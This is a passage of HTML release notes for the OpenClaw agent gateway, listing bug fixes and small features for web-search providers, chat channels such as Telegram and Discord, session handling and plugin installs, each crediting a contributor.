<p>Web search/SearXNG: show the JSON API <code>search.formats</code> prerequisite during SearXNG setup before prompting for the base URL. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250289649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65592" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65592/hovercard" href="https://github.com/openclaw/openclaw/pull/65592">#65592</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evanpaul14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evanpaul14">@evanpaul14</a>.</p>
</li>
<li>
<p>Web search/SearXNG: pass through <code>img_src</code> image URLs from SearXNG image-category results. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207995751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61416" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61416/hovercard" href="https://github.com/openclaw/openclaw/pull/61416">#61416</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sghael/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sghael">@sghael</a>.</p>
</li>
<li>
<p>Web search/Kimi: fail explicitly when Moonshot returns an ungrounded chat answer instead of native web-search evidence, so Kimi no longer reports generic fallback text as a successful search. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117727594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52573/hovercard" href="https://github.com/openclaw/openclaw/issues/52573">#52573</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangwllu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangwllu">@wangwllu</a>.</p>
</li>
<li>
<p>Web search: keep public provider requests on the strict SSRF guard and reserve private-network access for explicit self-hosted SearXNG/Firecrawl endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350921258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74357/hovercard" href="https://github.com/openclaw/openclaw/issues/74357">#74357</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350976183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74360/hovercard" href="https://github.com/openclaw/openclaw/pull/74360">#74360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a>.</p>
</li>
<li>
<p>Firecrawl: reject private, loopback, metadata, and non-HTTP(S) <code>firecrawl_scrape</code> target URLs before forwarding them to Firecrawl. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081587848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48133/hovercard" href="https://github.com/openclaw/openclaw/pull/48133">#48133</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kn1ghtc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kn1ghtc">@kn1ghtc</a>.</p>
</li>
<li>
<p>Web search/Firecrawl: allow self-hosted private/internal Firecrawl <code>baseUrl</code> endpoints, including HTTP for private targets, while keeping hosted Firecrawl on the strict official endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234128169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63877/hovercard" href="https://github.com/openclaw/openclaw/issues/63877">#63877</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194271236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59666" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59666/hovercard" href="https://github.com/openclaw/openclaw/pull/59666">#59666</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235261313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63941" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63941/hovercard" href="https://github.com/openclaw/openclaw/pull/63941">#63941</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347547141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74013" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74013/hovercard" href="https://github.com/openclaw/openclaw/pull/74013">#74013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhthompson12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhthompson12">@jhthompson12</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mlightsnow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mlightsnow">@Mlightsnow</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shad0wca7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shad0wca7">@shad0wca7</a>.</p>
</li>
<li>
<p>CLI/models: report gateway model fallback attempts in <code>infer model run --json</code> and avoid double-prefixing provider-qualified defaults such as <code>openrouter/auto</code> in <code>models status</code>. Partially fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299726655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69527" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69527/hovercard" href="https://github.com/openclaw/openclaw/issues/69527">#69527</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexifra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexifra">@alexifra</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: strip trailing assistant prefill turns from verified OpenRouter Anthropic model requests when reasoning is enabled, so Claude 4.6 routes no longer fail with Anthropic's prefill rejection through the OpenAI-compatible adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362626247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75395" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75395/hovercard" href="https://github.com/openclaw/openclaw/issues/75395">#75395</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sbmilburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sbmilburn">@sbmilburn</a>.</p>
</li>
<li>
<p>Voice Call: add per-number inbound routing for dialed-number greetings, response agents/models/prompts, and TTS voice overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161590255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56604/hovercard" href="https://github.com/openclaw/openclaw/issues/56604">#56604</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/healthstatus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/healthstatus">@healthstatus</a>.</p>
</li>
<li>
<p>Feishu: preserve Feishu/Lark HTTP error bodies for message sends, media sends, and chat member lookups, so HTTP 400 failures include vendor code, message, log id, and troubleshooter details. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346852455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73860" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73860/hovercard" href="https://github.com/openclaw/openclaw/issues/73860">#73860</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/desksk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/desksk">@desksk</a>.</p>
</li>
<li>
<p>Agents/transcripts: avoid reopening large Pi transcript files through the synchronous session manager for maintenance rewrites, persisted tool-result truncation, manual compaction boundary hardening, and queued compaction rotation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Web search/Exa: accept <code>plugins.entries.exa.config.webSearch.baseUrl</code>, normalize it to the Exa <code>/search</code> endpoint, and partition cached results by endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140768584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54928" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54928/hovercard" href="https://github.com/openclaw/openclaw/issues/54928">#54928</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140867375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54939/hovercard" href="https://github.com/openclaw/openclaw/pull/54939">#54939</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrpl327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrpl327">@mrpl327</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lyfuci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lyfuci">@lyfuci</a>.</p>
</li>
<li>
<p>Web search/MiniMax: include MiniMax Search in the web-search setup flow and let <code>MINIMAX_API_KEY</code> participate in MiniMax Search auto-detection. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252993330" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65828" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65828/hovercard" href="https://github.com/openclaw/openclaw/pull/65828">#65828</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: preserve official source-linked trust through archive installs, so OpenClaw can install trusted ClawHub plugin packages that trigger the built-in dangerous-pattern scanner. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: install package runtime dependencies for archive-backed plugin installs, so ClawHub packages such as WhatsApp load declared dependencies after download. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/tools: cache repeated plugin tool factory results only for matching request context, reducing per-turn tool prep without leaking sandbox, session, browser, delivery, or runtime config state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367960262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75956/hovercard" href="https://github.com/openclaw/openclaw/issues/75956">#75956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Providers/LM Studio: allow <code>models.providers.lmstudio.params.preload: false</code> to skip OpenClaw's native model-load call so LM Studio JIT loading, idle TTL, and auto-evict can own model lifecycle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367728807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75921/hovercard" href="https://github.com/openclaw/openclaw/issues/75921">#75921</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>.</p>
</li>
<li>
<p>Agents/transcripts: keep chat history, restart recovery, fork token checks, and stale-token compaction checks on bounded async transcript reads or cached async indexes instead of reparsing large session files. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Telegram: inherit the process DNS result order for Bot API transport and downgrade recovered sticky IPv4 fallback promotions to debug logs, while keeping pinned-IP escalation warnings visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367563919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75904" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75904/hovercard" href="https://github.com/openclaw/openclaw/issues/75904">#75904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/highfly-hi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/highfly-hi">@highfly-hi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</p>
</li>
<li>
<p>Sessions: keep durable external conversation pointers, including group and thread-scoped chat sessions, out of age, count, and disk-budget maintenance eviction while still allowing synthetic runtime entries to age out. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175356638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58088/hovercard" href="https://github.com/openclaw/openclaw/issues/58088">#58088</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drinkflav/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drinkflav">@drinkflav</a>.</p>
</li>
<li>
<p>Web search/MiniMax: allow <code>MINIMAX_OAUTH_TOKEN</code> to satisfy MiniMax Search credentials, so OAuth-authorized MiniMax Token Plan setups do not need a separate web-search key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252008941" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65768" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65768/hovercard" href="https://github.com/openclaw/openclaw/issues/65768">#65768</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kikibrian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kikibrian">@kikibrian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>.</p>
</li>
<li>
<p>Providers/MiniMax: derive Coding Plan usage polling from the configured MiniMax base URL, so global setups no longer query the CN usage host. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246049228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65054/hovercard" href="https://github.com/openclaw/openclaw/issues/65054">#65054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sixone74/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sixone74">@sixone74</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</p>
</li>
<li>
<p>Control UI/WebChat: skip assistant-media transcript supplements when stale media refs resolve to no playable media, so text-only final replies are not stored a second time as gateway-injected assistant messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347391100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73956/hovercard" href="https://github.com/openclaw/openclaw/issues/73956">#73956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</p>
</li>
<li>
<p>Sessions: reject <code>sessions_send</code> targets that resolve to thread-scoped chat sessions, so inter-agent coordination cannot be injected into active human-facing Slack or Discord threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117274546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52496/hovercard" href="https://github.com/openclaw/openclaw/issues/52496">#52496</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barry-p5cc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barry-p5cc">@barry-p5cc</a>.</p>
</li>
<li>
<p>Subagents: honor <code>sessions_spawn</code> with <code>expectsCompletionMessage: false</code> by skipping parent completion handoff delivery while still running child cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75848/hovercard" href="https://github.com/openclaw/openclaw/issues/75848">#75848</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Media/completions: treat media-only message-tool sends as delivered async completion output, avoiding duplicate raw <code>MEDIA:</code> fallback posts after video or music generation finishes.</p>
</li>
<li>
<p>Gateway/logging: keep deferred channel startup logs on the subsystem logger, so Slack, Discord, Telegram, and voice-call startup messages keep timestamped prefixes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Codex/app-server: recover JSON-RPC frames split by raw command-output newlines and include a redacted preview when malformed app-server messages still reach the console. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Replies/typing: keep typing alive for queued follow-up messages that are genuinely waiting behind an active run, instead of making chat surfaces look idle while work is queued. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251046189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65685/hovercard" href="https://github.com/openclaw/openclaw/issues/65685">#65685</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/papag00se/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/papag00se">@papag00se</a>.</p>
</li>
<li>
<p>ACP/Discord: suppress completion announce delivery for inline thread-bound ACP session runs, so Discord thread-bound ACP replies are not delivered twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204352483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60780/hovercard" href="https://github.com/openclaw/openclaw/issues/60780">#60780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a>.</p>
</li>
<li>
<p>Discord/threads: ignore webhook-authored copies in already-bound Discord session threads even when the webhook id differs, preventing PluralKit proxy copies from creating duplicate turn pressure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114424047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52005/hovercard" href="https://github.com/openclaw/openclaw/issues/52005">#52005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
<p>Discord/threads: return the created thread as partial success when the follow-up initial message fails, so agents do not retry thread creation and create empty duplicate threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084295408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48450" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48450/hovercard" href="https://github.com/openclaw/openclaw/issues/48450">#48450</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dahifi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dahifi">@dahifi</a>.</p>
</li>
<li>
<p>Discord/components: consume every button or select in a non-reusable component message after the first authorized click, so single-use panels cannot fire sibling callbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132338088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54227" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54227/hovercard" href="https://github.com/openclaw/openclaw/issues/54227">#54227</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fujiwarakasei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fujiwarakasei">@fujiwarakasei</a>.</p>
</li>
<li>
<p>macOS/config: preserve existing <code>gateway.auth</code> and unrelated config keys during app fallback writes, so dashboard or Talk settings changes cannot strand Control UI clients by dropping persisted auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364348126" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75631/hovercard" href="https://github.com/openclaw/openclaw/issues/75631">#75631</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fuma2013/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fuma2013">@Fuma2013</a>.</p>
</li>
<li>
<p>Control UI/TUI: keep reconnecting chat sends bound to the same backing session id and let TUI relaunches resume the last selected session, avoiding silent fresh sessions after refresh, reconnect, or terminal restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225359321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63195/hovercard" href="https://github.com/openclaw/openclaw/issues/63195">#63195</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283461066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68162/hovercard" href="https://github.com/openclaw/openclaw/issues/68162">#68162</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342917722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73546/hovercard" href="https://github.com/openclaw/openclaw/issues/73546">#73546</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bond260312-cmyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bond260312-cmyk">@bond260312-cmyk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhong18804784882/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhong18804784882">@zhong18804784882</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mtuwei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mtuwei">@mtuwei</a>.</p>
</li>
<li>
<p>Plugins/tools: let plugin manifests declare static tool availability so reply startup skips unavailable plugin tool runtimes instead of importing factories that only return <code>null</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord/reactions: skip reaction listener registration when DMs and group DMs are disabled and every configured guild has <code>reactionNotifications: "off"</code>, avoiding needless reaction-event queue work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078796783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47516" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47516/hovercard" href="https://github.com/openclaw/openclaw/issues/47516">#47516</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/x4v13r1120/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/x4v13r1120">@x4v13r1120</a>.</p>
</li>
<li>
<p>CLI sessions: preserve explicit manual-attach reuse bindings so trusted CLI sessions are not invalidated on the first turn when auth, prompt, or MCP fingerprints drift. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75849/hovercard" href="https://github.com/openclaw/openclaw/issues/75849">#75849</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Telegram/streaming: keep partial preview streaming enabled for plain reply-to replies, disabling drafts only for real native quote excerpts that require Telegram quote parameters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577179" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73505" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73505/hovercard" href="https://github.com/openclaw/openclaw/issues/73505">#73505</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/choury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/choury">@choury</a>.</p>
</li>
<li>
<p>Config: log the "newer OpenClaw" version warning once per process instead of once per config snapshot read. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367749952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75927" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75927/hovercard" href="https://github.com/openclaw/openclaw/pull/75927">#75927</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</p>
</li>
<li>
<p>Telegram/message actions: treat benign delete-message 400s as no-op warnings instead of runtime errors, so stale or already-removed messages do not create noisy delete failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345339727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73726" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73726/hovercard" href="https://github.com/openclaw/openclaw/issues/73726">#73726</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Avicennasis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Avicennasis">@Avicennasis</a>.</p>
</li>
<li>
<p>Telegram: split long default markdown sends and media follow-up text into safe HTML chunks, so outbound messages over Telegram's limit no longer fail as one oversized Bot API request. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367257816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75868/hovercard" href="https://github.com/openclaw/openclaw/issues/75868">#75868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhengsx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhengsx">@zhengsx</a>.</p>
</li>
<li>
